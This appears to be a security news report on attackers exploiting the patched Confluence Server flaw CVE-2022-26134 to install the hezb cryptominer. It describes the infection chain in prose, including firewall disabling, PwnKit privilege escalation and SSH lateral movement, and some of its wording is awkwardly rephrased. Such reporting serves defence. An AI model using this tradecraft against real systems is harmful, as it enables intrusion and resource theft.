A now-patched critical security flaw affecting Atlassian Confluence Server that was disclosed a few months ago is being actively exploited for illicit cryptocurrency mining on unpatched installations.
“If not patched and successfully exploited, this vulnerability could be used for multiple and more malicious attacks, such as complete domain takeover of infrastructure and deployment information thieves, remote access Trojans (RATs) and ransomware,” said a Trend Micro threat researcher. Sunil Bharti said in a report.
The problem, followed as CVE-2022-26134 (CVSS score: 9.8), was tackled by the Australian software company in June 2022.
In one of the infection chains observed by the cybersecurity firm, the flaw was exploited to download and execute a shell script (“ro.sh”) on the victim’s machine, which in turn recovered a second shell script (“ap.sh”).
The malicious code is designed to update the PATH variable to include additional paths such as “/tmp”, download the cURL utility (if not already present) from a remote server, disable the iptables firewall, abuse the Default PwnKit (CVE-2021-4034) to gain root privileges and ultimately deploy the hezb crypto-miner.
Like other cryptojacking attacks, the shell script also terminates other competing coin miners, disables agents from cloud service providers Alibaba and Tencent, before performing a lateral move via SSH.
Lacework’s analysis further shows that the command and control (C2) server used to fetch the cURL software as well as the hezb miner also distributed a Golang-based ELF binary named “kik” which allows the malware to kill the processes of interest.
Users are advised to prioritize fixing the flaw as it could be exploited by malicious actors for other nefarious purposes.
“Attackers could take advantage of injecting their own code for interpretation and access to the targeted Confluence domain, as well as carrying out attacks ranging from controlling the server for subsequent malicious activity to damaging the infrastructure itself. “, said Bharti.